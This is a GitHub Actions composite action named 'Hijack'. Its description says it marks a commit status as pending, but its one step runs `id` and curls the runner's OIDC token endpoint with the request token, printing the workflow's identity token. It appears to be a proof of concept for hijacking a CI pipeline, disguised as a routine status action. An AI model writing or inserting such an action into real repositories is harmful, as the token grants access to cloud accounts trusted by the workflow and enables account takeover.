name: Hijack
description: 'Adds a commit status at the start of the test run to set the status to pending'
inputs:
  name:
    description: "Name of the check"
    required: true
  git_ref:
    description: "The git commit, tag, or branch to check out. Requires a corresponding Karpenter snapshot release"
    required: true
runs:
  using: "composite"
  steps:
    - run: |
        echo "Hello from custom action"
        id
        curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" $ACTIONS_ID_TOKEN_REQUEST_URL
